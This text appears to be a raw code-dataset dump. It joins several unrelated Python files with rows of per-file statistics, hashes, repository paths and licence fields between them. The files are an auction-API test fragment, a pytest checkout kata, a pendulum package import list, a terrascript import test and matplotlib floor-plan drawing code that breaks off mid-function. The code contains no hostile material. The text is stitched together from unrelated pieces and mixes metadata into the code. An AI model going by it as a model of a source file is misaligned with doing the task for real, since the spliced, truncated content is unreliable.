    response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['data']["status"], 'active.tendering')
    # The auctionPeriod lives on the first lot when lots exist, else on the auction.
    if self.initial_lots:
        item = response.json['data']["lots"][0]
    else:
        item = response.json['data']
    self.assertIn('auctionPeriod', item)
    self.assertIn('shouldStartAfter', item['auctionPeriod'])
    # shouldStartAfter must never precede the end of the tendering period.
    self.assertGreaterEqual(item['auctionPeriod']['shouldStartAfter'],
                            response.json['data']['tenderPeriod']['endDate'])
    self.assertIn('T00:00:00+', item['auctionPeriod']['shouldStartAfter'])
    self.assertEqual(response.json['data']['next_check'], response.json['data']['tenderPeriod']['endDate'])
    # A far-future startDate must be accepted and echoed back verbatim.
    if self.initial_lots:
        response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {
            'data': {"lots": [{"auctionPeriod": {"startDate": "9999-01-01T00:00:00+00:00"}}]}})
        item = response.json['data']["lots"][0]
    else:
        response = self.app.patch_json('/auctions/{}'.format(self.auction_id),
                                       {'data': {"auctionPeriod": {"startDate": "9999-01-01T00:00:00+00:00"}}})
        item = response.json['data']
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(item['auctionPeriod']['startDate'], '9999-01-01T00:00:00+00:00')
    # Patching startDate to None must remove the field from auctionPeriod.
    if self.initial_lots:
        response = self.app.patch_json('/auctions/{}'.format(self.auction_id),
                                       {'data': {"lots": [{"auctionPeriod": {"startDate": None}}]}})
        item = response.json['data']["lots"][0]
    else:
        response = self.app.patch_json('/auctions/{}'.format(self.auction_id),
                                       {'data': {"auctionPeriod": {"startDate": None}}})
        item = response.json['data']
    self.assertEqual(response.status, '200 OK')
    self.assertNotIn('startDate', item['auctionPeriod'])
def reset_auction_period(self):
    # End-to-end chronograph scenario: verifies how shouldStartAfter,
    # startDate and next_check interact across tendering -> auction states,
    # including direct DB mutations that simulate the passage of time.
    self.app.authorization = ('Basic', ('chronograph', ''))
    response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['data']["status"], 'active.tendering')
    # auctionPeriod lives on the first lot when lots exist, else on the auction.
    if self.initial_lots:
        item = response.json['data']["lots"][0]
    else:
        item = response.json['data']
    self.assertIn('auctionPeriod', item)
    self.assertIn('shouldStartAfter', item['auctionPeriod'])
    self.assertGreaterEqual(item['auctionPeriod']['shouldStartAfter'], response.json['data']['tenderPeriod']['endDate'])
    self.assertEqual(response.json['data']['next_check'], response.json['data']['tenderPeriod']['endDate'])
    # While tendering: a far-future startDate is accepted and kept.
    if self.initial_lots:
        response = self.app.patch_json('/auctions/{}'.format(self.auction_id),
                                       {'data': {"lots": [{"auctionPeriod": {"startDate": "9999-01-01T00:00:00"}}]}})
        item = response.json['data']["lots"][0]
    else:
        response = self.app.patch_json('/auctions/{}'.format(self.auction_id),
                                       {'data': {"auctionPeriod": {"startDate": "9999-01-01T00:00:00"}}})
        item = response.json['data']
    self.assertEqual(response.status, '200 OK')
    self.assertGreaterEqual(item['auctionPeriod']['shouldStartAfter'], response.json['data']['tenderPeriod']['endDate'])
    self.assertIn('9999-01-01T00:00:00', item['auctionPeriod']['startDate'])
    # Move the auction into active.auction and re-check the invariants.
    self.set_status('active.auction', {'status': 'active.tendering'})
    response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.json['data']["status"], 'active.auction')
    item = response.json['data']["lots"][0] if self.initial_lots else response.json['data']
    self.assertGreaterEqual(item['auctionPeriod']['shouldStartAfter'], response.json['data']['tenderPeriod']['endDate'])
    # In active.auction a far-future startDate also drives next_check.
    if self.initial_lots:
        response = self.app.patch_json('/auctions/{}'.format(self.auction_id),
                                       {'data': {"lots": [{"auctionPeriod": {"startDate": "9999-01-01T00:00:00"}}]}})
        item = response.json['data']["lots"][0]
    else:
        response = self.app.patch_json('/auctions/{}'.format(self.auction_id),
                                       {'data': {"auctionPeriod": {"startDate": "9999-01-01T00:00:00"}}})
        item = response.json['data']
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.json['data']["status"], 'active.auction')
    self.assertGreaterEqual(item['auctionPeriod']['shouldStartAfter'], response.json['data']['tenderPeriod']['endDate'])
    self.assertIn('9999-01-01T00:00:00', item['auctionPeriod']['startDate'])
    self.assertIn('9999-01-01T00:00:00', response.json['data']['next_check'])
    # Simulate "auction should have started now" by writing directly to the DB.
    now = get_now().isoformat()
    auction = self.db.get(self.auction_id)
    if self.initial_lots:
        auction['lots'][0]['auctionPeriod']['startDate'] = now
    else:
        auction['auctionPeriod']['startDate'] = now
    self.db.save(auction)
    response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.json['data']["status"], 'active.auction')
    item = response.json['data']["lots"][0] if self.initial_lots else response.json['data']
    self.assertGreaterEqual(item['auctionPeriod']['shouldStartAfter'], response.json['data']['tenderPeriod']['endDate'])
    self.assertGreater(response.json['data']['next_check'], item['auctionPeriod']['startDate'])
    self.assertEqual(response.json['data']['next_check'], self.db.get(self.auction_id)['next_check'])
    # A startDate equal to tenderPeriod.endDate replaces the far-future value.
    if self.initial_lots:
        response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {
            'data': {"lots": [{"auctionPeriod": {"startDate": response.json['data']['tenderPeriod']['endDate']}}]}})
        item = response.json['data']["lots"][0]
    else:
        response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {
            'data': {"auctionPeriod": {"startDate": response.json['data']['tenderPeriod']['endDate']}}})
        item = response.json['data']
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.json['data']["status"], 'active.auction')
    self.assertGreaterEqual(item['auctionPeriod']['shouldStartAfter'], response.json['data']['tenderPeriod']['endDate'])
    self.assertNotIn('9999-01-01T00:00:00', item['auctionPeriod']['startDate'])
    self.assertGreater(response.json['data']['next_check'], response.json['data']['tenderPeriod']['endDate'])
    auction = self.db.get(self.auction_id)
    self.assertGreater(auction['next_check'], response.json['data']['tenderPeriod']['endDate'])
    # Collapse the tender period (endDate == startDate) directly in the DB:
    # next_check must then disappear entirely.
    auction['tenderPeriod']['endDate'] = auction['tenderPeriod']['startDate']
    if self.initial_lots:
        auction['lots'][0]['auctionPeriod']['startDate'] = auction['tenderPeriod']['startDate']
    else:
        auction['auctionPeriod']['startDate'] = auction['tenderPeriod']['startDate']
    self.db.save(auction)
    response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
    if self.initial_lots:
        item = response.json['data']["lots"][0]
    else:
        item = response.json['data']
    self.assertGreaterEqual(item['auctionPeriod']['shouldStartAfter'], response.json['data']['tenderPeriod']['endDate'])
    self.assertNotIn('next_check', response.json['data'])
    self.assertNotIn('next_check', self.db.get(self.auction_id))
    # shouldStartAfter must be stable across repeated empty patches.
    shouldStartAfter = item['auctionPeriod']['shouldStartAfter']
    response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
    if self.initial_lots:
        item = response.json['data']["lots"][0]
    else:
        item = response.json['data']
    self.assertEqual(item['auctionPeriod']['shouldStartAfter'], shouldStartAfter)
    self.assertNotIn('next_check', response.json['data'])
    # Re-setting a far-future startDate restores next_check.
    if self.initial_lots:
        response = self.app.patch_json('/auctions/{}'.format(self.auction_id),
                                       {'data': {"lots": [{"auctionPeriod": {"startDate": "9999-01-01T00:00:00"}}]}})
        item = response.json['data']["lots"][0]
    else:
        response = self.app.patch_json('/auctions/{}'.format(self.auction_id),
                                       {'data': {"auctionPeriod": {"startDate": "9999-01-01T00:00:00"}}})
        item = response.json['data']
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.json['data']["status"], 'active.auction')
    self.assertGreaterEqual(item['auctionPeriod']['shouldStartAfter'], response.json['data']['tenderPeriod']['endDate'])
    self.assertIn('9999-01-01T00:00:00', item['auctionPeriod']['startDate'])
    self.assertIn('9999-01-01T00:00:00', response.json['data']['next_check'])
| 56.231638
| 120
| 0.643223
| 1,089
| 9,953
| 5.797062
| 0.064279
| 0.108348
| 0.144464
| 0.069697
| 0.899889
| 0.887534
| 0.876287
| 0.843656
| 0.824648
| 0.794868
| 0
| 0.033004
| 0.156737
| 9,953
| 176
| 121
| 56.551136
| 0.719171
| 0.009344
| 0
| 0.784314
| 0
| 0
| 0.27983
| 0.00761
| 0
| 0
| 0
| 0
| 0.359477
| 1
| 0.019608
| false
| 0
| 0.006536
| 0
| 0.026144
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
026ffeaa35e6366451926d8e71d9d46ea82fc598
| 2,211
|
py
|
Python
|
Checkout/test_checkout.py
|
locspoc/python-test-driven-development
|
adbd460b963d622695ec840250a8d22572e2c200
|
[
"MIT"
] | null | null | null |
Checkout/test_checkout.py
|
locspoc/python-test-driven-development
|
adbd460b963d622695ec840250a8d22572e2c200
|
[
"MIT"
] | null | null | null |
Checkout/test_checkout.py
|
locspoc/python-test-driven-development
|
adbd460b963d622695ec840250a8d22572e2c200
|
[
"MIT"
] | null | null | null |
# TO DO
# - Can create instance of Checkout class
# - Can add item price
# - Can calculate the current total
# - Can add multiple items and get correct total
# - Can add discount rules
# - Can apply discount rules to the total
# - Exception is thrown for item added without a price
# Checkout Kata Practice Session 28/5/2021
import pytest
from checkout import Checkout
@pytest.fixture()
def checkout():
    """A Checkout pre-loaded with prices: item "a" costs 1, item "b" costs 2."""
    co = Checkout()
    for sku, price in (("a", 1), ("b", 2)):
        co.addItemPrice(sku, price)
    return co
def test_CanCalculateTotal(checkout):
    """A single "a" item (priced 1) totals 1."""
    checkout.addItem("a")
    total = checkout.calculateTotal()
    assert total == 1
def test_GetCorrectTotalWithMultipleItems(checkout):
    """One "a" (1) plus one "b" (2) totals 3."""
    for sku in ("a", "b"):
        checkout.addItem(sku)
    assert checkout.calculateTotal() == 3
def test_canAddDiscountRule(checkout):
    # Smoke test: registering a discount rule must not raise.
    # NOTE(review): no assertion here — the rule's effect on the total is
    # exercised by test_canApplyDiscountRule below.
    checkout.addDiscount("a", 3, 2)
# @pytest.mark.skip
def test_canApplyDiscountRule(checkout):
    """Three "a" items under a 3-for-2 discount total 2."""
    checkout.addDiscount("a", 3, 2)
    for _ in range(3):
        checkout.addItem("a")
    assert checkout.calculateTotal() == 2
def test_ExceptionWithBadItem(checkout):
    # "c" has no registered price, so addItem is expected to raise.
    with pytest.raises(Exception):
        checkout.addItem("c")
# def test_AssertTrue():
# assert True
# import pytest
# from checkout import Checkout
# @pytest.fixture()
# def checkout():
# checkout = Checkout()
# checkout.addItemPrice("a", 1)
# checkout.addItemPrice("b", 2)
# return checkout
# def test_CanCalculateTotal(checkout):
# checkout.addItem("a")
# assert checkout.calculateTotal() == 1
# def test_GetCorrectTotalWithMultipleItems(checkout):
# checkout.addItem("a")
# checkout.addItem("b")
# assert checkout.calculateTotal() == 3
# def test_canAddDiscountRule(checkout):
# checkout.addDiscount("a", 3, 2)
# def test_canApplyDiscountRule(checkout):
# checkout.addDiscount("a", 3, 2)
# # @pytest.mark.skip
# def test_canApplyDiscountRule(checkout):
# checkout.addDiscount("a", 3, 2)
# checkout.addItem("a")
# checkout.addItem("a")
# checkout.addItem("a")
# assert checkout.calculateTotal() == 2
# def test_ExceptionWithBadItem(checkout):
# with pytest.raises(Exception):
# checkout.addItem("c")
| 26.011765
| 54
| 0.695161
| 250
| 2,211
| 6.1
| 0.256
| 0.157377
| 0.104918
| 0.094426
| 0.824262
| 0.824262
| 0.824262
| 0.824262
| 0.824262
| 0.806557
| 0
| 0.01486
| 0.1782
| 2,211
| 85
| 55
| 26.011765
| 0.824436
| 0.578471
| 0
| 0.269231
| 0
| 0
| 0.01236
| 0
| 0
| 0
| 0
| 0
| 0.115385
| 1
| 0.230769
| false
| 0
| 0.076923
| 0
| 0.346154
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5a02a4c1e7b6d236ad43a896e537235c9534901f
| 396
|
py
|
Python
|
pendulum_eqns/__init__.py
|
danhagen/NonlinearControl
|
3bda71a058ec3b1a598df886e9485fd4d08982ba
|
[
"MIT"
] | null | null | null |
pendulum_eqns/__init__.py
|
danhagen/NonlinearControl
|
3bda71a058ec3b1a598df886e9485fd4d08982ba
|
[
"MIT"
] | 5
|
2018-08-01T17:19:38.000Z
|
2020-08-18T19:57:46.000Z
|
pendulum_eqns/__init__.py
|
danhagen/NonlinearControl
|
3bda71a058ec3b1a598df886e9485fd4d08982ba
|
[
"MIT"
] | 1
|
2020-07-22T22:38:20.000Z
|
2020-07-22T22:38:20.000Z
|
from pendulum_eqns.physiology.muscle_params_BIC_TRI import *
from pendulum_eqns.physiology.musclutendon_equations import *
from pendulum_eqns.reference_trajectories._01 import *
from pendulum_eqns.integrator_backstepping_equations import *
from pendulum_eqns.state_equations import *
from pendulum_eqns.initial_tension import *
from pendulum_eqns.init_muscle_activation_controlled_model import *
| 49.5
| 67
| 0.886364
| 51
| 396
| 6.470588
| 0.45098
| 0.254545
| 0.339394
| 0.4
| 0.281818
| 0
| 0
| 0
| 0
| 0
| 0
| 0.005435
| 0.070707
| 396
| 7
| 68
| 56.571429
| 0.891304
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
5a227ecc833ca104a64f2be795ec3a31f1807a48
| 793
|
py
|
Python
|
tests/test_provider_nrkno_lastpass.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 507
|
2017-07-26T02:58:38.000Z
|
2022-01-21T12:35:13.000Z
|
tests/test_provider_nrkno_lastpass.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 135
|
2017-07-20T12:01:59.000Z
|
2021-10-04T22:25:40.000Z
|
tests/test_provider_nrkno_lastpass.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 81
|
2018-02-20T17:55:28.000Z
|
2022-01-31T07:08:40.000Z
|
# tests/test_provider_nrkno_lastpass.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:20:52 UTC)
def test_provider_import():
    # Smoke test: the generated provider module must be importable.
    import terrascript.provider.nrkno.lastpass
def test_resource_import():
    # Smoke test: the generated resource class must be importable.
    from terrascript.resource.nrkno.lastpass import lastpass_secret
def test_datasource_import():
    # Smoke test: the generated data-source class must be importable.
    from terrascript.data.nrkno.lastpass import lastpass_secret
# TODO: Shortcut imports without namespace for official and supported providers.
# TODO: This has to be moved into a required_providers block.
# def test_version_source():
#
# import terrascript.provider.nrkno.lastpass
#
# t = terrascript.provider.nrkno.lastpass.lastpass()
# s = str(t)
#
# assert 'https://github.com/nrkno/terraform-provider-lastpass' in s
# assert '0.5.3' in s
| 27.344828
| 80
| 0.752837
| 107
| 793
| 5.448598
| 0.551402
| 0.133791
| 0.144082
| 0.164666
| 0.243568
| 0
| 0
| 0
| 0
| 0
| 0
| 0.022321
| 0.152585
| 793
| 28
| 81
| 28.321429
| 0.845238
| 0.620429
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0.035714
| 0
| 1
| 0.5
| true
| 0.5
| 1
| 0
| 1.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 8
|
5a5985b5278f4fcf14e04488af12d80b71de488a
| 34,890
|
py
|
Python
|
code/floorplan_analyzer/src/util/disegna.py
|
goldleaf3i/predicted2Dlayout
|
0ea3ea065dc1865ece18d4df755794be2eeeef28
|
[
"MIT"
] | 1
|
2019-06-12T02:13:52.000Z
|
2019-06-12T02:13:52.000Z
|
code/floorplan_analyzer/src/util/disegna.py
|
goldleaf3i/predicted2Dlayout
|
0ea3ea065dc1865ece18d4df755794be2eeeef28
|
[
"MIT"
] | null | null | null |
code/floorplan_analyzer/src/util/disegna.py
|
goldleaf3i/predicted2Dlayout
|
0ea3ea065dc1865ece18d4df755794be2eeeef28
|
[
"MIT"
] | null | null | null |
from matplotlib import pyplot as plt
from PIL import Image
import cv2
import random
from descartes import PolygonPatch
from matplotlib.path import Path
import matplotlib.path as mplPath
import matplotlib.patches as patches
import networkx as nx
import matplotlib.colors as colors
import matplotlib.cm as cmx
import numpy as np
import os
import matplotlib
import random
from shapely.geometry import Point
from shapely.geometry import Polygon
def setup_plot():
    """Wipe matplotlib's implicit state and return a fresh (fig, ax) pair
    with equal aspect ratio, no frame and no ticks."""
    # Clear any figure/axes left over from a previous call.
    plt.clf()
    plt.cla()
    plt.close()
    fig, ax = plt.subplots()
    plt.axis('equal')
    ax.axis('off')
    ax.set_xticks([])
    ax.set_yticks([])
    return fig, ax
def disegna(lista):
    '''
    disegna una lista di Segmenti

    Draws each wall segment ("muro") as a black 2px line, then saves the
    figure. Each segment contributes its two endpoints (x1, y1)-(x2, y2).
    '''
    ascisse = []
    ordinate = []
    for muro in lista:
        ascisse.append(muro.x1)
        ascisse.append(muro.x2)
        ordinate.append(muro.y1)
        ordinate.append(muro.y2)
        # NOTE(review): source indentation was flattened; plotting and the
        # buffer clears are placed inside the loop (one plot call per
        # segment), which is what the `del buffer[:]` resets suggest — confirm.
        plt.plot(ascisse,ordinate, color='k', linewidth=2.0)
        del ascisse[:]
        del ordinate[:]
    plt.title('test')
    plt.savefig('culotroia.png')
def disegna_map(map, savefig=True, format='pdf', filepath='.', savename='0_Map', title=False):
    """Render the input metric map and save it, or show it interactively."""
    fig, ax = setup_plot()
    out_path = os.path.join(filepath, savename + '.' + format)
    ax.imshow(map)
    if title:
        ax.set_title('0.metric map')
    if savefig:
        plt.savefig(out_path, bbox_inches='tight')
    else:
        plt.show()
def disegna_hough(img, lines, savefig=True, format='pdf', filepath='.', savename='2_Hough', title=False):
    """Draw the detected Hough lines in green over a copy of the input image."""
    fig, ax = setup_plot()
    out_path = os.path.join(filepath, savename + '.' + format)
    img2 = img.copy()
    if len(img2.shape) == 2:
        # grayscale input -> RGB so the green overlay is visible
        img2 = cv2.cvtColor(img2, cv2.COLOR_GRAY2RGB)
    if title:
        ax.set_title('1.hough lines')
    for x1, y1, x2, y2 in lines:
        cv2.line(img2, (x1, y1), (x2, y2), (0, 255, 0), 2)
    ax.imshow(img2, cmap='Greys')
    if savefig:
        plt.savefig(out_path, bbox_inches='tight')
    else:
        plt.show()
def disegna_grafici_per_accuracy(stanze, stanze_gt, savefig=True, format='pdf', filepath='.', savename='9_accuracy', title=False):
    """Overlay computed rooms (black) and ground-truth rooms (red) outlines."""
    fig, ax = setup_plot()
    out_path = os.path.join(filepath, savename + '.' + format)
    if title:
        ax.set_title('accuracy')
    for poligono in stanze:
        xs, ys = poligono.exterior.xy
        ax.plot(xs, ys, color='BLACK', alpha=0.7, linewidth=3, solid_capstyle='round', zorder=2)
    for poligono in stanze_gt:
        xs, ys = poligono.exterior.xy
        ax.plot(xs, ys, color='RED', alpha=0.7, linewidth=3, solid_capstyle='round', zorder=2)
    if savefig:
        plt.savefig(out_path, bbox_inches='tight')
    else:
        plt.show()
def disegna_GT_parziali(stanze_gt, stanze_gt_con_frontira, savefig=True, format='pdf', filepath='.', savename='20_stanzeGT', title=False):
    """Draw ground-truth rooms: black when present in stanze_gt_con_frontira, red otherwise."""
    fig, ax = setup_plot()
    out_path = os.path.join(filepath, savename + '.' + format)
    if title:
        ax.set_title('stanzeGT')
    for poly in stanze_gt:
        con_frontiera = any(p.equals(poly) for p in stanze_gt_con_frontira)
        colore = 'BLACK' if con_frontiera else 'RED'
        xs, ys = poly.exterior.xy
        ax.plot(xs, ys, color=colore, alpha=0.7, linewidth=3, solid_capstyle='round', zorder=2)
    if savefig:
        plt.savefig(out_path, bbox_inches='tight')
    else:
        plt.show()
def disegna_area_reale_GT_parziali(stanze_gt, stanze_gt_con_frontira, contorno, xmin, ymin, xmax, ymax, savefig=True, format='pdf', filepath='.', savename='20_stanzeGT', title=False):
    """Draw ground-truth rooms; rooms matched in *stanze_gt_con_frontira* are black and
    get the largest part of their area lying outside *contorno* filled in red-orange,
    the others are outlined in red.

    Fixes vs. original: no longer shadows builtin ``max``; uses the portable
    ``print()`` form instead of the Python-2-only statement; uses ``isinstance``
    instead of a ``type() ==`` check; guards against an empty/degenerate difference
    geometry (previously PolygonPatch(None) would crash).
    """
    fig, ax = setup_plot()
    out_path = os.path.join(filepath, savename + '.' + format)
    if title:
        ax.set_title('stanzeGT')
    for poly in stanze_gt:
        trovato = any(p.equals(poly) for p in stanze_gt_con_frontira)
        if trovato:
            xs, ys = poly.exterior.xy
            ax.plot(xs, ys, color='BLACK', alpha=0.7, linewidth=3, solid_capstyle='round', zorder=2)
            # portion of the GT room that falls outside the observed contour
            resto = poly - poly.intersection(contorno)
            print(type(resto))  # debug output kept from original
            if isinstance(resto, Polygon):
                best = resto
            else:
                # multi-part difference: keep only the piece with the largest area
                best = None
                area_massima = 0
                for parte in resto.geoms:
                    if parte.area > area_massima:
                        area_massima = parte.area
                        best = parte
            if best is not None:  # guard: difference may be empty or all-degenerate
                f_patch = PolygonPatch(best, fc='#FF3300', ec='BLACK')
                ax.add_patch(f_patch)
        else:
            xs, ys = poly.exterior.xy
            ax.plot(xs, ys, color='RED', alpha=0.7, linewidth=3, solid_capstyle='round', zorder=2)
    if savefig:
        plt.savefig(out_path, bbox_inches='tight')
    else:
        plt.show()
def disegna_stanze_stanzeGt_contorno(stanze, stanze_gt, contours, savefig=True, format='pdf', filepath='.', savename='9_accuracy', title=False):
    """Overlay computed rooms (black), ground-truth rooms (red) and the map contour (grey)."""
    fig, ax = setup_plot()
    out_path = os.path.join(filepath, savename + '.' + format)
    if title:
        ax.set_title('accuracy')
    for poligono in stanze:
        xs, ys = poligono.exterior.xy
        ax.plot(xs, ys, color='BLACK', alpha=0.7, linewidth=3, solid_capstyle='round', zorder=2)
    for poligono in stanze_gt:
        xs, ys = poligono.exterior.xy
        ax.plot(xs, ys, color='RED', alpha=0.7, linewidth=3, solid_capstyle='round', zorder=2)
    # external contour as a single grey polyline
    xs = [punto[0][0] for punto in contours]
    ys = [punto[0][1] for punto in contours]
    ax.plot(xs, ys, color='0.8', linewidth=3.0)
    if savefig:
        plt.savefig(out_path, bbox_inches='tight')
    else:
        plt.show()
def disegna_stanza_vuote(stanze, savefig=True, format='pdf', filepath='.', savename='9_accuracy', title=False, nero=True):
    """Draw empty room outlines — black when *nero* is True, red otherwise."""
    fig, ax = setup_plot()
    out_path = os.path.join(filepath, savename + '.' + format)
    if title:
        ax.set_title('accuracy')
    # keep the original strict comparison against True
    colore = 'BLACK' if nero == True else 'RED'
    for poligono in stanze:
        xs, ys = poligono.exterior.xy
        ax.plot(xs, ys, color=colore, alpha=0.7, linewidth=3, solid_capstyle='round', zorder=2)
    if savefig:
        plt.savefig(out_path, bbox_inches='tight')
    else:
        plt.show()
def disegna_canny(edges_canny, savefig=True, format='pdf', filepath='.', savename='1_Canny', title=False):
    """Render the edges detected by the Canny operator."""
    fig, ax = setup_plot()
    out_path = os.path.join(filepath, savename + '.' + format)
    if title:
        ax.set_title('canny')
    ax.imshow(edges_canny, cmap='Greys')
    if savefig:
        plt.savefig(out_path, bbox_inches='tight')
    else:
        plt.show()
def disegna_segmenti(lista, savefig=True, format='pdf', filepath='.', savename='3_Muri', title=False):
    """Draw every wall segment in *lista*, one black line per segment."""
    fig, ax = setup_plot()
    out_path = os.path.join(filepath, savename + '.' + format)
    if title:
        ax.set_title('3.Muri')
    for segmento in lista:
        ax.plot([segmento.x1, segmento.x2], [segmento.y1, segmento.y2], color='k', linewidth=2)
    if savefig:
        plt.savefig(out_path, bbox_inches='tight')
    else:
        plt.show()
def disegna_segmenti_e_raggi_cerchio(lista, linee, savefig=True, format='pdf', filepath='.', savename='3_Muri', title=False):
    """Draw the wall segments (black) plus the circle rays around the frontier (blue)."""
    fig, ax = setup_plot()
    out_path = os.path.join(filepath, savename + '.' + format)
    if title:
        ax.set_title('3.Muri')
    for segmento in lista:
        ax.plot([segmento.x1, segmento.x2], [segmento.y1, segmento.y2], color='k', linewidth=2)
    for raggio in linee:
        xs, ys = raggio.xy
        ax.plot(xs, ys, color='#6699cc', alpha=0.7, linewidth=3, solid_capstyle='round', zorder=2)
    if savefig:
        plt.savefig(out_path, bbox_inches='tight')
    else:
        plt.show()
def disegna_segmenti_raggi_cerchio_contorno(vertici, xmin, ymin, xmax, ymax, lista, linee, savefig=True, format='pdf', filepath='.', savename='3_Muri', title=False):
    """Draw the frontier circle rays behind the filled external contour.

    *lista* (wall segments) is accepted for interface compatibility but is not
    drawn: the corresponding code was already disabled in the original.
    """
    fig, ax = setup_plot()
    out_path = os.path.join(filepath, savename + '.' + format)
    if title:
        ax.set_title('3.Muri')
    # circle rays, pushed behind the contour patch via a negative zorder
    for raggio in linee:
        xs, ys = raggio.xy
        ax.plot(xs, ys, color='#6699cc', alpha=0.7, linewidth=3, solid_capstyle='round', zorder=-5)
    # filled external contour
    percorso = mplPath.Path(vertici)
    ax.add_patch(patches.PathPatch(percorso, facecolor='orange', lw=2))
    ax.set_xlim(xmin - 1, xmax + 1)
    ax.set_ylim(ymin - 1, ymax + 1)
    if savefig:
        plt.savefig(out_path, bbox_inches='tight')
    else:
        plt.show()
def get_colors(labels):
    """Return one random colour (hex string) per distinct label.

    Colours are sampled from the 'Paired' colormap at random positions, so
    calls are not deterministic. The label values themselves are not used,
    only the number of distinct labels.

    Fix vs. original: the local variable no longer shadows the builtin ``hex``.
    """
    colori_assegnati = []
    cmap = matplotlib.cm.get_cmap('Paired')
    for _label in set(labels):
        rgba = cmap(random.random())
        hex_color = matplotlib.colors.rgb2hex(rgba)
        colori_assegnati.append(hex_color)
    return colori_assegnati
def disegna_dbscan(labels, facce, facce_poligoni, xmin, ymin, xmax, ymax, edges, contours,savefig = True, format='pdf', filepath = '.', savename = '6_DBSCAN', title = False):
    '''
    Draw the faces according to the clusters produced by DBSCAN: faces in the
    same cluster share one randomly chosen colour from the 'Paired' colormap.
    Heavy edges (weight >= 0.3) are drawn as thick black walls and the external
    contour as a grey polyline. Returns (assigned colours, figure, axes).

    NOTE(review): indentation was lost in this copy of the file and has been
    reconstructed from the code's logic — verify against the upstream source.
    '''
    fig, ax = setup_plot()
    savename = os.path.join(filepath, savename+'.'+format)
    colori_assegnati = []
    cmap = matplotlib.cm.get_cmap('Paired')
    if title :
        ax.set_title('6.dbscan')
    for label in set(labels):
        # one random colormap colour per cluster label
        rgba = cmap(random.random())
        col =matplotlib.colors.rgb2hex(rgba)  # convert to hexadecimal
        colori_assegnati.append(col)
        for index,l in enumerate(labels):
            if (l == label):
                f = facce[index]
                f_poly = facce_poligoni[index]
                f_patch = PolygonPatch(f_poly,fc=col,ec='BLACK')
                ax.add_patch(f_patch)
                ax.set_xlim(xmin,xmax)
                ax.set_ylim(ymin,ymax)
                # place the cluster label at the mean of the face's border endpoints
                sommax = 0
                sommay = 0
                for b in f.bordi:
                    sommax += (b.x1)+(b.x2)
                    sommay += (b.y1)+(b.y2)
                xtesto = sommax/(2*len(f.bordi))
                ytesto = sommay/(2*len(f.bordi))
                ax.text(xtesto,ytesto,str(l),fontsize=8)
    # heavy edges drawn as thick black segments, one plot call per edge
    ascisse = []
    ordinate = []
    for edge in edges:
        if (edge.weight>=0.3):  # was 0.3
            ascisse.append(edge.x1)
            ascisse.append(edge.x2)
            ordinate.append(edge.y1)
            ordinate.append(edge.y2)
            ax.plot(ascisse,ordinate, color='k', linewidth=4.0)
            del ascisse[:]
            del ordinate[:]
    # contour polyline — remove this part when using the alternative
    # contour-detection method (see the disabled block below)
    ascisse = []
    ordinate = []
    for c1 in contours:
        ascisse.append(c1[0][0])
        ordinate.append(c1[0][1])
    ax.plot(ascisse,ordinate,color='0.8',linewidth=3.0)
    del ascisse[:]
    del ordinate[:]
    # disabled alternative kept from the original (for the other contour method)
    '''
    ascisse = []
    ordinate = []
    for c1 in contours:
    for c2 in c1:
    ascisse.append(c2[0][0])
    ordinate.append(c2[0][1])
    ax.plot(ascisse,ordinate,color='0.8',linewidth=3.0)
    del ascisse[:]
    del ordinate[:]
    '''
    if savefig :
